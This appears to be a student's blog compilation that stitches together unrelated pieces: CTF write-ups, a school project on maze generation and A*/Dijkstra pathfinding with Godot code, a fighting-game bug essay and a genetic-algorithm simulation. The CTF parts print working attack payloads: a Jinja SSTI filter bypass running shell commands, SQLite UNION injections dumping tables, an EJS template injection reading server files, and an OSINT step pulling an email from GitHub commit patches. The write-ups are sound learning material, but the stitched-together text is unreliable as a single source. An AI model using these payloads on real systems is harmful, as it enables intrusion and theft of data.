heres my ssti2 writeup dont kill me branson

When you submit the form, it is submitted to the /announce endpoint and rendered as a h2

Test for template evaluation using: {{11*6+1}} If the template engine is evaluating expressions, this should return: (mandatory 67 joke)

Since the page renders 67, we know the input is being interpreted as a Jinja template expression, confirming the presence of SSTI.

Use the same payload as SSTI1 in order to try and read the flag:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}

Clearly theres some sort of filter going on here

There is a character blacklist.

Regarding this hint, blacklisting characters is considered a bad input sanitisation strategy because it tries to block known bad patterns, but attackers can almost always find alternative ways to express the same thing. This approach is fragile because programming languages often allow multiple ways to represent the same operation.

test for the blocked characters

{{ _ }} and {{ . }} are both blocked. In order to make our payload go through, we have to find substitutes for these characters.

. is used to access attributes of objects, like os.system('cls'). In order to bypass this, we can replace it with the usage of attr.

_ is used in the Python internal classes, like __builtins__. In order to bypass this, we can use hex encoding: _ becomes \x5f. Jinja strings follow Python string semantics. This means escape sequences such as: \x5f are interpreted as _. Therefore, \x5f\x5finit\x5f\x5f is evaluated at runtime as __init__.

Because of this flexibility, we can often reconstruct blocked characters or syntax at runtime using such workarounds.

make the payload (pt. 1)

Make the necessary changes, and the payload becomes:

{{ 
    self|
    attr('\x5f\x5finit\x5f\x5f')|
    attr('\x5f\x5fglobals\x5f\x5f')|
    attr('\x5f\x5fbuiltins\x5f\x5f')|
    attr('\x5f\x5fimport\x5f\x5f')('os')|
    attr('popen')('cat flag')|
    attr('read')() 
}}

backtrack

Something’s wrong. Let’s backtrack through the payload:

{{ 
    self|
    attr('\x5f\x5finit\x5f\x5f')|
    attr('\x5f\x5fglobals\x5f\x5f')|
    attr('\x5f\x5fbuiltins\x5f\x5f')
}}

Still an error. Backtrack again:

{{ 
    self|
    attr('\x5f\x5finit\x5f\x5f')|
    attr('\x5f\x5fglobals\x5f\x5f') 
}}

as shown by the highlight, unlike the other packages, in this situation __builtins__ is a dictionary, not a path to the module. This matters because the next step of the exploit assumes attribute access:

__builtins__.__import__

Therefore, this exploit path probably won’t work.

using the module

In Python, dictionary indexing is done using dict[key], and it is internally implemented using dict.__getitem__(key). Therefore, globals['__builtins__'] is equivalent to globals.__getitem__('__builtins__').

To get the module from __builtins__, we would have to do something along the lines of __globals__['__builtins__']. However, the characters [ and ] are blocked as well.

Instead, we can try getitem instead:

{{ 
    self|
    attr('\x5f\x5finit\x5f\x5f')|
    attr('\x5f\x5fglobals\x5f\x5f')|
    attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|
    attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|
    attr('popen')('cat flag')|
    attr('read')() 
}}

(hi teachers this is my SIL, I did this so that the tooltips and whatnot could be customised to my liking and so that the demo could embed directly into the main page, if any issues please let me know)

I chose to explore maze generation and pathfinding because the subject combines rigorous mathematics, algorithmic logic, and a surprising amount of creativity. A maze looks deliberately complex, yet many maze algorithms rely only on simple graph concepts and a bit of randomness. Likewise, pathfinding algorithms such as A* and Dijkstra’s find optimal routes even though their decisions are made one step at a time. Programming these algorithms and watching them run side-by-side turned abstract definitions into living processes for me — the math began to feel tangible. I was also drawn by the clear real-world links: GPS route planning, robotic navigation and procedurally generated game levels all use the same core ideas.

As with last year’s SIL, I vibe coded a demo. If godot didnt mess up, it should be rendered below.

While researching on this topic, I found this interesting youtube short, which was a direct reference for the demo.

Graph theory

In graph theory, we study objects called graphs, which consist of vertices (or nodes) connected by edges . A maze can be modelled with graphs. Every cell becomes a vertex, and every removed wall creates an edge between two vertices. For example:

A path is simply a sequence of adjacent vertices.

A cycle is a closed path where you can return to the start without repeating edges.

A graph is connected if there is a path between any two vertices.

A tree is a connected graph with no cycles.

The grid itself, before walls are carved, is a special type of graph called a lattice graph — specifically a 2D rectangular lattice where each node has up to 4 neighbours. This graph is regular and predictable, but once walls are removed using an algorithm, the structure becomes far more interesting.

Representing a maze as a graph matters because the algorithms I used, A* and Dijkstra, all operate on graphs. They don’t care whether the graph came from a maze, a road network, or a social network. This abstraction is what allows these ideas to apply to everything from Google Maps to neural network architectures.

Graph theory provides useful tools for analysing the behaviour of the maze:

The maze generated by DFS Backtracking is guaranteed to be a spanning tree: a subgraph that connects all vertices with no cycles. This property mathematically ensures a unique solution path between any two points.

The absence of cycles makes the complexity of pathfinding easier to analyse, because algorithms like A* operate more predictably on trees.

The structure of the graph affects the search space: long corridors reduce branching factor, while dense branching increases it. Branching factor directly affects the time complexity of pathfinding algorithms.

Understanding these properties helped me see why different algorithms behave differently even on the same maze: the mathematics of the graph strongly influences the mathematics of the search.

Maze Generation

The DFS Backtracking algorithm is a direct application of depth-first traversal in graph theory. Traversal means systematically visiting all nodes of a graph, and DFS proceeds by always moving as far as possible along one branch before backtracking.

In mathematical terms, DFS explores the graph in a manner equivalent to a preorder tree traversal. When applied to maze generation, we treat each cell as a node and each potential passage as an edge. The algorithm builds the maze by gradually constructing a spanning tree of the grid graph.

DFS can be expressed recursively, but internally it always relies on a stack which is a last-in–first-out data structure, where both inputs and outputs are from the same end of the structure. This structure is essential because it ensures that backtracking happens in the reverse order of exploration.

At each step, the algorithm chooses a random unvisited neighbour. Random choice introduces non-determinism, which means that the algorithm can generate exponentially many possible spanning trees. This relates to a known concept in combinatorics: the number of spanning trees of a graph grows rapidly with graph size. On an n×n grid, the number is enormous — far too large to compute manually — which explains why each maze looks unique.

Because DFS never creates cycles, the final structure is always a tree. Trees have useful mathematical characteristics: Exactly V−1 edges for V vertices.

A unique simple path between any two vertices.

Average path length (tree height) depends on randomness and traversal behaviour.

This explains why DFS mazes tend to have long, winding corridors. The DFS procedure tends to create long branches before backtracking, meaning the resulting spanning tree is fairly “deep.” This property can even be analysed statistically: DFS mazes have a characteristic path-length distribution that differs from Prim’s or Kruskal’s mazes. Understanding the maze as a spanning tree gave me a clear mathematical reason for the maze’s visual and navigational behaviour.

This was done in my simulation through the below approach.

A maze of size ( w \times h ) is represented as a graph:

• Each cell is a vertex.
• Between any two adjacent cells, there is a possible edge.
• Initially, all edges are “blocked” by walls.

Formally:

[ G = (V, E) ]

where

• (

  V

  = w \cdot h )

• Each vertex has up to 4 neighbors: [ \text{deg}(v) \le 4 ]

The list:

const DIRS := [
    Vector2i(0, -1),  # up
    Vector2i(1, 0),   # right
    Vector2i(0, 1),   # down
    Vector2i(-1, 0)   # left
]

encodes the adjacency relation between vertices. This is equivalent to defining the edge set mathematically as:

[ E = {(v, v + d) \mid d \in \text{DIRS and within grid}} ]

Maze Representation

Each cell stores:

[up, right, down, left]

with:

• true → wall exists (edge is blocked)
• false → passage (edge is open)

This is equivalent to storing the adjacency matrix of a planar grid graph but compressed per vertex.

The algorithm used is DFS Backtracking, which mathematically produces a random spanning treeof the grid graph.

A perfect maze must have:

• exactly one unique path between any two cells → meaning no cycles
• all cells reachable → meaning connected

A structure that is connected and cycle-free is, by definition, a tree.

Thus the algorithm constructs a spanning tree.

Algorithm Description (Mathematical Form)

The algorithm:

1. Choose a start vertex ( v_0 ).

2. Repeatedly:

   • Look for an unvisited neighbor ( u in N(v) ).
   • Choose one randomly.
   • Add edge ( (v, u) ) to the spanning tree.
   • Move to ( u ).
3. If a vertex has no unvisited neighbors, backtrack.

This is equivalent to performing DFS on an undirected graph, but with randomized choices.

More formally:

[ T = { (v, Next(v)) during DFS traversal } ]

Because DFS never revisits a cell and never adds an edge to an already-visited vertex, cycles cannot form.

This code:

var unvisited_neighbors := []
for i in range(DIRS.size()):
    var nx = current.x + DIRS[i].x
    var ny = current.y + DIRS[i].y
    if nx >= 0 and nx < width and ny >= 0 and ny < height:
        if not visited[ny][nx]:
            unvisited_neighbors.append(i)

mathematically checks:

This is a classical neighbor set:

[ N(v) = { v + d in DIRS } ]

restricted by grid boundaries.

The “grid boundary” condition defines the domain of the graph.

This line:

var dir_index = unvisited_neighbors[rng.randi_range(0, unvisited_neighbors.size() - 1)]

implements a uniform random selection from a discrete set.

This randomness ensures the spanning tree produced is not deterministic unless seeded.

When the algorithm chooses a neighbor and moves there, it “knocks down” walls:

grid[current.y][current.x][dir_index] = false
grid[next.y][next.x][opposite] = false

The opposite direction uses modular arithmetic:

[ opposite = (i + 2) \mod 4 ]

This matches the fact that grid directions are symmetric:

• up ↔ down
• right ↔ left

var stack: Array = []
stack.append(start)

The DFS stack represents the recursion structure of DFS.

Whenever the algorithm backtracks:

stack.pop_back()

this is equivalent to returning from a recursive DFS call.

When the algorithm terminates:

• The visited set contains all vertices → connected
• No cell was visited twice → acyclic
• There are exactly ( w \cdot h - 1 ) passages (edges in a spanning tree)

Thus the maze is guaranteed to be a perfect maze— one path between any two points.

A* Pathfinding

A* is essentially an optimisation algorithm that solves the shortest-path problem using both real and estimated information. It is built on the idea of best-first search, but mathematically enhanced by evaluating each node using the formula: f(n)=g(n)+h(n) where g(n) is the known cost so far, h(n) is the heuristic, a mathematical estimate of future cost and f(n) is the total estimated cost of the best path passing through n.

The mathematical strength of A* comes from its use of heuristics.

1. Admissibility
   • A heuristic h(n) is admissible if it never overestimates the true cost to reach the goal. For Manhattan distance on a grid, this is true because each move reduces the Manhattan distance by at most 1. By guaranteeing h(n)≤h*(n) (where h*(n)h^*(n)h*(n) is the true optimal cost), A* is mathematically guaranteed to find an optimal path.
2. Consistency (Monotonicity)
   • A heuristic is consistent if:
   • h(n)≤cost(n,n′)+h(n′)h(n) - This ensures the estimated total cost f(n) never decreases along a path. Consistency means A* never needs to revisit a node once it has found the best path to it. This reduces time complexity significantly.
3. Search-space reduction
   • One of the most mathematically powerful aspects of A* is the reduction in explored nodes. Without a heuristic, Dijkstra explores in all directions equally. A* explores a cone of directions that point roughly toward the goal. The branching factor and depth determine the theoretical complexity: Dijkstra: O(bd) in the worst case. A*: O(bd−k), where k depends on heuristic strength.

Thus, even a simple heuristic dramatically improves efficiency.

1. Relationship to optimisation
   • A* can be viewed as minimising a cost function. In optimisation terms, it finds the path that minimises the energy f(n). This parallels gradient descent and other optimisation algorithms, showing how deep the mathematical connections run.

This was done with the below code.

extends Node
class_name Solver

signal path_updated(path: Array)
signal open_closed_updated(open_set: Array, closed_set: Array)

What this does

• Declares a base Solver node you can reuse/extend.

• Defines two signals:

  • path_updated(path) — emitted when a full path is reconstructed (used by UI to draw the path).
  • open_closed_updated(open_set, closed_set) — emitted each step so UI can display the current open/closed sets.

var astar: AStar2D
var width: int
var height: int

var start_id: int
var goal_id: int

var open_set: Array = []
var closed_set: Array = []
var came_from: Dictionary = {}
var g_score: Dictionary = {}
var f_score: Dictionary = {}
var path_computed: bool = false
var current_path: Array = []

State / data structures

• astar: reference to an AStar2D graph helper (provides neighbor lists and position lookup).
• width, height: grid dimensions — used to convert between (x,y) and linear node IDs.
• start_id, goal_id: integer IDs for start/goal nodes (IDs are computed as y * width + x).
• open_set: nodes to be considered (frontier). For A*, this is usually a priority queue, but here it’s a plain Array.
• closed_set: nodes already processed.
• came_from: Dictionary mapping node -> predecessor for path reconstruction.
• g_score: Dictionary mapping node -> cost from start.
• f_score: Dictionary mapping node -> g + heuristic.
• path_computed: flag indicating algorithm finished (found path or exhausted).
• current_path: final path as an array of Vector2i positions.

func setup(astar_ref: AStar2D, w: int, h: int) -> void:
	astar = astar_ref
	width = w
	height = h

setup

• Stores references to the AStar2D helper and grid dimensions.
• Call this once before solving.

func start_solver(start: Vector2i, goal: Vector2i) -> void:
	start_id = start.y * width + start.x
	goal_id = goal.y * width + goal.x

	open_set.clear()
	closed_set.clear()
	came_from.clear()
	g_score.clear()
	f_score.clear()
	current_path.clear()
	path_computed = false

	initialize_open_set()
	emit_signal("open_closed_updated", open_set, closed_set)

start_solver

• Converts Vector2i positions to linear node IDs using id = y * width + x.
• Clears all previous state so the solver starts fresh.
• Calls initialize_open_set() — an overridable method where different algorithms put the initial node(s) into open_set and set initial scores.
• Emits open_closed_updated so a UI or visualizer can immediately show the starting frontier.

# Override this in child classes
func initialize_open_set() -> void:
	pass

initialize_open_set

• Meant to be implemented by subclasses (e.g., A* puts the start in open_set and sets g_score/f_score).

func step_solver() -> bool:
	if path_computed or open_set.is_empty():
		path_computed = true
		return true

	var current := pick_next_node()
	if current == goal_id:
		reconstruct_path(current)
		path_computed = true
		return true

	move_current_to_closed(current)

	process_neighbors(current)

	emit_signal("open_closed_updated", open_set, closed_set)
	return false

step_solver — single-step driver

• This is the main per-frame / per-tick method. Returns true if the algorithm is finished.

• Behavior:

  1. If path_computed is already true or open_set is empty (no path), mark done and return true.
  2. Choose the next node to process by calling pick_next_node() (overridable).
  3. If current is the goal_id, reconstruct the path and finish.
  4. Move the current node from open_set to closed_set.
  5. process_neighbors(current) — relax neighbor edges and update scores.
  6. Emit open_closed_updated so the UI sees the latest open/closed sets.
  7. Return false (not done) so caller can continue stepping.

This design makes it easy to run one solver step per frame to visualize progress.

func pick_next_node() -> int:
	return open_set[0]

pick_next_node (base)

• Default chooses the first element of open_set.
• Subclasses (like A*) override this to pick the node with smallest f_score.

func move_current_to_closed(current: int) -> void:
	open_set.erase(current)
	closed_set.append(current)

move_current_to_closed

• Removes current from open_set and appends it to closed_set.
• open_set.erase(current) removes only the first occurrence — fine if each node appears once.

func process_neighbors(current: int) -> void:
	for neighbor in astar.get_point_connections(current):
		if neighbor in closed_set:
			continue
		var tentative_g = g_score.get(current, 999999) + 1
		if neighbor not in open_set:
			open_set.append(neighbor)
		elif tentative_g >= g_score.get(neighbor, 999999):
			continue
		came_from[neighbor] = current
		g_score[neighbor] = tentative_g
		f_score[neighbor] = tentative_g + get_heuristic(neighbor)

process_neighbors — relaxing edges

• For each neighbor of current (via astar.get_point_connections(current)):

  • Skip if neighbor is in closed_set.
  • tentative_g = g_score[current] + 1. The +1 assumes uniform cost between adjacent cells.
  • If neighbor not in open_set, add it (discover the node).
  • If the new tentative_g is not better than the neighbor’s current g_score, skip.

  • Otherwise:

    • Set came_from[neighbor] = current to record path.
    • Update g_score[neighbor].
    • Update f_score[neighbor] = g + heuristic(neighbor).

• Notes:

  • g_score.get(..., 999999) uses 999999 as a stand-in for infinity.
  • This is standard A*/Dijkstra relaxation logic. If get_heuristic returns 0, algorithm behaves like Dijkstra.

func get_heuristic(id: int) -> int:
	return 0  # default Dijkstra/BFS has no heuristic

get_heuristic

• Base implementation returns 0 so base Solver is effectively Dijkstra (no heuristic).
• Subclasses override to provide heuristic estimates (e.g., Manhattan distance).

func reconstruct_path(current: int) -> void:
	var temp := current
	var id_path: Array = [temp]
	while came_from.has(temp):
		temp = came_from[temp]
		id_path.insert(0, temp)

	var path_vec: Array = []
	for id in id_path:
		var v := astar.get_point_position(id)
		path_vec.append(Vector2i(int(v.x), int(v.y)))
	current_path = path_vec
	emit_signal("path_updated", current_path)

reconstruct_path

• Walks backward from current (goal) to start using came_from.
• Builds id_path in reverse then converts each node ID back to Vector2i using astar.get_point_position(id).
• Stores the resulting current_path and emits path_updated so visuals can render the full route.

func get_current_path() -> Array:
	return current_path

getter

• Returns the computed path (array of Vector2i) for external code to read.

AStar subclass

extends Solver
class_name AStarSolver

func get_heuristic(id: int) -> int:
	var pos := astar.get_point_position(id)
	var goal_pos := astar.get_point_position(goal_id)
	return int(abs(pos.x - goal_pos.x) + abs(pos.y - goal_pos.y))  # Manhattan

func pick_next_node() -> int:
	var best = open_set[0]
	for id in open_set:
		if f_score.get(id, 999999) < f_score.get(best, 999999):
			best = id
	return best

func initialize_open_set() -> void:
	open_set.append(start_id)
	g_score[start_id] = 0
	f_score[start_id] = get_heuristic(start_id)

What AStarSolver changes

• get_heuristic: returns Manhattan distance between node and goal (|dx| + |dy|). Good for 4-way grid movement.
• pick_next_node: scans open_set and returns the node with smallest f_score. (Because open_set is a plain array, this is O(n) per pick. Performance can be improved with a binary heap.)
• initialize_open_set: seeds the algorithm by adding start_id to open_set, setting g_score[start] = 0, and f_score[start] = heuristic(start).

Dijkstra’s

Dijkstra’s Algorithm solves the single-source shortest path problem on graphs with non-negative edge weights . It does so by repeatedly selecting the node with the smallest tentative distance and “relaxing” its neighbours.

1. Distance relaxation updates the estimated distance to a node. This iterative refinement is essentially dynamic programming: each update narrows the gap between the tentative and true shortest path values.

2. The algorithm is correct because once a node is extracted from the priority queue, its tentative distance is guaranteed to be the true shortest distance. That happens because all edge weights are non-negative, so no later path can “shortcut” back to this node. This property fails if negative edges exist, which explains why Dijkstra cannot handle them.

3. Special case: unweighted grids In an unweighted maze, every edge has weight of 1, which simplifies Dijkstra to:

   • Equivalent to BFS

   • Expands nodes in concentric layers

   • Uses a queue instead of a priority queue

Thus, Dijkstra’s behaviour becomes mathematically predictable and symmetric. This is because A* reduces to Dijkstra when h(n)=0. In other words, Dijkstra = A with no heuristic. This mathematical relationship shows how closely the two algorithms are connected.

Reflections

This project deepened my appreciation for how relatively simple mathematical ideas can power complex systems like traffic routing, public transport scheduling, and even evacuation planning, which use the same principles of graph modelling and shortest-path optimisation. In robotics, pathfinding must be combined with obstacle avoidance and sensor uncertainty; the algorithms I studied are the foundation for those higher-level systems.

</head>

Fruit Game

This is a normal message.

Hover over this to see a tooltip.

Again, Yomi is a turn-based fighting game. A game in which strategy and decision making comes before reaction time and techs.

Today, I talk about Fresh Milk, the bug that involves the only frame-perfect input in the game.

Content essentially paraphrased from:

Cowboy

At launch, Cowboy was a monster. Cowboy is armed with a sword, gun and lasso, and possessed 1f instant teleports, being able to deal effective damage at close range, grapple at medium range and shoot at long range, as well as catch up to his opponent really quickly. Horizontal slash was a fast forward attack that outspeeds and outranges many attacks in the game. But patch after patch chipped away at him: his teleports were weakened, his ranged tools nerfed, and his damage output fell behind characters like Wizard, Ninja, and Robot.

Cowboy’s samurai–cowboy aesthetic kept him popular with fans, but competitively he sank to the bottom of the tier list. He was too predictable, too rigid, and lacked explosive options to keep pace with the evolving meta.

That all changed with the introduction of Foresight—a new mechanic meant to fix Cowboy’s movement. Instead, it opened the door to one of the most infamous exploits in fighting game history.

Foresight

Foresight was a mechanic that limited Cowboy’s instant teleports and made it more balanced. Foresight allows you to place an afterimage on action. On future turns, you are allowed to Shift to the afterimage, letting you teleport to it after a few frames of delay. Moreover, since Shift was an additional toggle on top of your current selected action, it made it possible to gap close to an enemy and launch an attack on the same frame. Functionally, it’s Flying Raijin from Naruto.

Even better, you can trigger Rift on the foresight afterimage, causing it to explode. Foresight basically lets you zone out an area, keeping your opponent wary of the afterimage. After all, with Cowboy’s strong grounded neutrals, Foresight threatens not only the area that you’re at, but also the area around your Foresight.

Teleporting in games is a funny thing. When you shift from, say, air to ground, it wouldn’t be right to shift with an air move while you reach the ground, right? Essentially, Ivy had it prepared that when a Foresight afterimage was placed on the ground, the moves on the player’s UI would toggle to the ground moves, preventing you from using air- or ground-exclusive moves when not in the correct state.

MilkMannerism was a labber that played on the beta branch of Yomi, looking to discover new tech. For example, Foresight preserves your momentum when you shift to it. If you set up with a quick mobility option then shift to a Foresight afterimage, you will appear at the afterimage with the same momentum that you had before, while allowing you to execute different moves at the same time. This greatly extended Cowboy’s effective attack range.

However, MilkMannerism, when testing, tried to place another Foresight afterimage after the initial shift. Now, Foresight has limits on how far from the user the afterimage can be placed; normally, it’s a set radius. When the user gets too far away from the afterimage, the afterimage will explode (to prevent users from going across the map to stall). What MilkMannerism realised was that even when the afterimage was exploding, if it was placed on the ground, the player’s UI would do the ground-air UI shift. But what if you shifted to an afterimage that was already set to explode? MilkMannerism tested it, and found that upon shifting, the player remained in the air, and was even able to execute grounded moves while in the air, effectively bypassing the UI toggle check.

Because you were only able to use the tech when the foresight was expiring, and since it was discovered by MilkMannerism, the tech was coined “Expired Milk”.

Expired Milk

Cowboy’s air options are limited. Generally, all of his aerial moves are low-damaging and high knockback. But with access to grounded moves in the air, Cowboy’s air combo potential grew immensely. For example, the move Stinger: slow windup, but long poking range and high damaging, and knocking the enemy prone upon hitting the ground. However, it’s true usage lies in its property, Infinite Hitstun. Yomi Hustle works on a stun-based system, when you’re stunned, you can adjust a Directional Influence (DI) wheel to influence your knockback. DI-ing upward is a great way to escape combos, because your enemies have to use up limited air options to chase you, which will force them to drop the combo. Infinite Hitstun keeps the enemy stunned until they hit the ground. Being able to hit Stinger and turn a combo ender into a combo extender drastically raised damage output.

Even worse, Cowboy has another grounded move, Backslash, which is an upward slash generally used for anti-air. However, Backslash has a sweet spot hitbox that deals extra damage if landed, and is extremely difficult to land on the ground, but very easy to land with the extra positioning in the air.

Expired Milk helped, but wasn’t revolutionary, it required a ton of setup (foresight, comboing, positioning, etc)

Fresh Milk

One day, an innocent message was posted in the discord, which eventually led to a discussion about Expired Milk. A labber called Pilebunker was confused at Expired Milk, apparently he had been doing it a different way the entire time, and just didn’t realise. However, the clips he showed were revolutionary; he had heard vaguely about Expired Milk, tested it out, and assumed that what he saw was what everyone else was doing.

His tech works because YOMI doesn’t check the validity of a move before confirmation, because YOMI only puts the moves you’re allowed to use onto your UI to begin with (therefore assuming that all moves on your UI are legal). Essentially, the tech works by setting up a grounded foresight while in the air. While still aerial, you activate the foresight Shift toggle (shifting your moves to grounded) and then immediately de-toggle Shift and lock in the move. What this does is confirm the move before the game is able to shift your moves back to aerial, which bypasses the game’s check.

This was revolutionary, removing the need to actually transition between aerial and grounded states, and simply using a mechanical input to trick the game into letting you use the wrong moves. Moreover, since Fresh Milk doesn’t consume the foresight (hence keeping it fresh), it can be chained as many times as you want.

Fresh Milk overcame Cowboy’s slow ground movement by allowing Cowboy to use his faster air-dash while grounded, letting him match the other characters in terms of grounded mobility. Grounded Lightning Slash only allows you to aim forward, but aerial Lightning Slash can be aimed upward around Cowboy. Aerial blocks are treated as both blocking low and high moves, which removed the risk brought about by simply blocking on the ground, as most attacks could be safely parried.

RIP Fresh Milk

Ivy tried and failed multiple times to patch out fresh milk.

However, this only made the input timing tighter, which made fresh milk still possible on supremely laggy computers and automated macros. For example, by preparing an AutoHotkey script to type 12mb of text into the chatbox at once, the game would lag enough to make fresh milk possible, or even negative edge inputs (holding then releasing keys simultaneously).

Eventually, Fresh Milk was worked into the game officially as Drift, an additional toggle on Foresight. This is only usable if the Foresight afterimage is in the opposite air-ground state from the user, causing the afterimage to explode, and was functionally the same as Fresh Milk, except for the fact that it could be predicted via the game’s move system.

This was a really cool addition that’s an example of developers turning a bug into a feature.

(Mutant still the better character imo)

Conclusion

funny milk bug, play the game.

the process of genetic algorithms

genetic algorithms operate on a population of candidate solutions, which allows the algorithm to explore multiple solutions in parallel.

as per evolution, genetic algorithms need a way to separate the strong from the weak. this is done through a fitness function, which serves as a way to evaluate the quality of this solution via a set of criteria. for example, if the problem was to find the most optimised schedule, solutions might be evaluated on how many tasks were fit within the schedule’s time period and penalised based on the amount of idle time left over.

in nature, fitter individuals are more likely to survive due to their traits, allowing them to reproduce and their attributes on. genetic algorithms combine the traits of two parents in a process called crossover. in problem-solving terms, this is done so because two fit solutions/two strong parents will be able to produce fitter solutions/stronger descendants.

moreover, genetic algorithms also have to introduce the process of mutation to ensure diversity in solutions and prevent overfitting. suppose a problem had one variable and the genetic algorithm converged until all members of the population perfectly met the fitness function’s requirements. if this variable were to change, none of the population would be able to adapt to the new conditions, as all of their traits had already converged to perfectly fit the old condition, and no amount of crossover will be able to produce a solution. in biological terms, mutation is the element of randomness that introduces unique traits in the hope that the trait will come in useful in the event of a great filter.

once a new generation of individuals is created through selection, crossover, and mutation, the old population is replaced. the cycle repeats: fitness is evaluated again, parents are chosen, and new children are created. over successive generations, the population tends to improve, as species in nature adapt over many lifetimes.

this video by Computerphile explores the application of genetic algorithms with the well-known knapsack problem (commonly solved in competitive programming using dynamic programming, but oh well)

simulation!

i made a simulation to illustrate the principles of genetic algorithms, optimising the problem of camouflage (matching colours).

oops, currently being fixed

in this simulation, a population of 100 matches their colour to a target colour. parents are chosen randomly, but are weighted by their fitness scores.

population is randomly generated at the start:

face.modulate = Color(randf(), randf(), randf())

fitness function evaluates the closeness of each population’s color to the target color, by taking the difference of each color and taking the magnitude:

func fitness(face: Node2D) -> float:
    var c = face.modulate
    var dr = c.r - target_color.r
    var dg = c.g - target_color.g
    var db = c.b - target_color.b
    var d = sqrt(dr * dr + dg * dg + db * db)
    return 1.0 - (d / sqrt(3.0))

to breed the next generation of solutions, we select fit parents using roulette wheel selection:

func _select_parent() -> Color:
    var total_fitness = 0.0
    for face in population:
        total_fitness += fitness(face)
    ...
    var pick = randf() * total_fitness
    var running_sum = 0.0
    for face in population:
        running_sum += fitness(face)
        if running_sum >= pick:
            return face.modulate

each RGB component of the child is randomly inherited from one of the parents. in a former patch, the child inherited the average of the parents, but this caused the simulation to tend towards a dull grey with varying tones of other colours.

func _crossover(c1: Color, c2: Color) -> Color:
    var red = c1.r if randf() < 0.5 else c2.r
    var green = c1.g if randf() < 0.5 else c2.g
    var blue = c1.b if randf() < 0.5 else c2.b
    return Color(red, green, blue)

to keep the simulation diverse and prevent premature convergence:

func _mutate(c: Color, rate: float = 0.05) -> Color:
    if randf() < rate:
        return Color(
            clamp(c.r + randf_range(-0.1, 0.1), 0, 1),
            clamp(c.g + randf_range(-0.1, 0.1), 0, 1),
            clamp(c.b + randf_range(-0.1, 0.1), 0, 1)
        )
    return c

as an interesting result of this, when the target colour has rgb components at the limits (0.0 or 1.0), the children tend to evolve colours closer to the target colour. this could be because the bounds of the child’s colour is limited, causing larger proportions of the children to develop such traits.

this small project demonstrates the power and beauty of genetic algorithms. while my example evolves colors toward a target, the same principles can scale to far more complex challenges. genetic algorithms don’t guarantee perfection, but they provide a robust way to discover good solutions in large search spaces.

I tried to learn css animation and failed horribly, so have this partially ChatGPTed elden ring boss text generator.

https://sentinelsofvigil.ctfd.io/team

> Tiers of Naughtiness (Web, 150)

upon following the challenge instructions and entering ‘playitprobro’ into the url parameter, we are given the output

NAUGHTY: playitprobro is in tier -> 3

it can be confirmed that this challenge is sqli by entering a single ' quote in the url parameter, yielding an SQL Error: unrecognized token: “’’’”

with sqli, we start by identifying the number of columns that is reflected in output, with the payload sql ?name=' UNION SELECT NULL--, which yields another SQL Error: SELECTs to the left and right of UNION do not have the same number of result columns

we systematically increase the number of NULL’s in the payload until the app stops throwing errors.

the database has accepted our offering of three NULLs and we can proceed forth. now, we determine which columns are visible in the output with payload ?name=' UNION SELECT 'AAA','BBB','CCC'--+, producing output

NAUGHTY: BBB is in tier -> CCC

i attempt to list the names of tables using the payload ?name=' UNION SELECT NULL,database(),version()--+ but this threw an SQL Error: no such function: database.

i then reattempt using a payload designed for sqlite ?name=' UNION SELECT NULL,name,type FROM sqlite_master WHERE type='table'--+, which produces output

NAUGHTY: tier_one_secret_123081223_autonau is in tier -> table

we found something tasty. use the payload ?name=' UNION SELECT NULL,name,type FROM pragma_table_info('tier_one_secret_123081223_autonau')--+ to read its columns

NAUGHTY: hahah_hi_user is in tier -> TEXT

now, directly dump the flag: ?name=' UNION SELECT NULL,hahah_hi_user,NULL FROM tier_one_secret_123081223_autonau--+. this produces the output:

NAUGHTY: SENTI{my_blind_sql_injection_chall_failed_so_heres_a_normal_one :( } is in tier -> None

flag: SENTI{my_blind_sql_injection_chall_failed_so_heres_a_normal_one :( }

> Fuzz (Web, 150)

https://sentinelsofvigil-fuzz.chals.io

web fuzzing is testing various inputs for a web app and hoping to induce unwanted behaviour, basically just poke it until it screams

in this website, we are provided a text input. upon submitting the input, the app reflects the input.

my first instinct was using the payload javascript <script>alert(1337)</script>, which successfully reflected an alert popup. this suggests XSS but nothing much can be done with that alone

using the payload sql ' OR 1=1;-- or similar simply reflects the input as is with no errors thrown, suggesting no sqli vulnerability

next i attempted ssti using the jinja2 payload jinja2 but the input was again, simply reflected

i then did some googling and found the payload

%\.

on https://www.imperva.com/learn/application-security/server-side-template-injection-ssti/, which managed to throw an error, ‘Error: Could not find matching close tag for “<%”.’

bingo. according to chatgpt this error comes from EJS (embedded javascript)

the payload <%= require('fs').readdirSync('.') %> yields an error ‘ReferenceError: ejs:1 » 1 Fuzzed <%= require(‘fs’).readdirSync(‘.’) %> require is not defined’

it looks like require is off limits… directly…

this can be circumvented by a payload like <%= global.process.mainModule.require('fs').readdirSync('.') %>, which lists all the contents of the source directory: ‘Fuzzed Dockerfile,app.js,flag.txt,node_modules,package-lock.json,package.json’

we want to read flag.txt, this can be done using the payload <%= this.constructor.constructor("return process.mainModule.require('fs').readFileSync('flag.txt', 'utf8')")() %>

with that, we obtain the flag, SENTI{n0t_s0_r4nd0m_1npu7}

> Convo (OSINT, 350)

our objective is to uncover the location that the user is staying at

our clues:

• good view from the roof
• captivating city lights
• uniquely shaped roof
• expensive to stay at
• a two hour drive from Muar
• near somewhere with over 100 haute coutre pieces (i have no idea what this refers to)

using common sense, we can deduce that said location is singapore’s marina bay sands

flag: SENTI{Marina_Bay_Sands} (probably, can't double check)

> Fisch (OSINT, 150)

we are given a roblox screenshot of an npc.

we can visit the fisch fandom wiki and search up the Category for NPCs.

upon looking around, the NPC’s likeness can be found under Islands/Snowcap Island, named Wilson.

by going to Wilson’s wiki page, we can find the coordinates to the missing item: X: 2880, Y: 138, Z: 2723.

flag: SENTI{2880,138,2723}

> Work 1 (OSINT, 200)

we are provided the image of someone’s brawl stars account

upon stealing my brawl stars addict friend’s phone, we can track down their profile by sending them a friend request. within the profile is a link to the employee’s twitter/X: @nomo reb rawl

a photo posted on the employee’s twitter shows their github username: C-employee-number-one

visiting their profile on github.com, we can identify the boss’ github account, ‘boss-of-slacker’. we can check out their commit history. by entering .patch behind the commit link, we can view the commit’s details, and find the boss’ email: ‘bigbosschan123@gmail.com’.

flag: SENTI{bigbosschan123@gmail.com}

> Work 3 (OSINT, 200)

a post on the employee’s twitter suggests the existence of a reddit account. another post suggests that they like to replace the spaces in their username with underscores, which is the reddit username format. therefore, their username should be u/nomo_reb_rawl

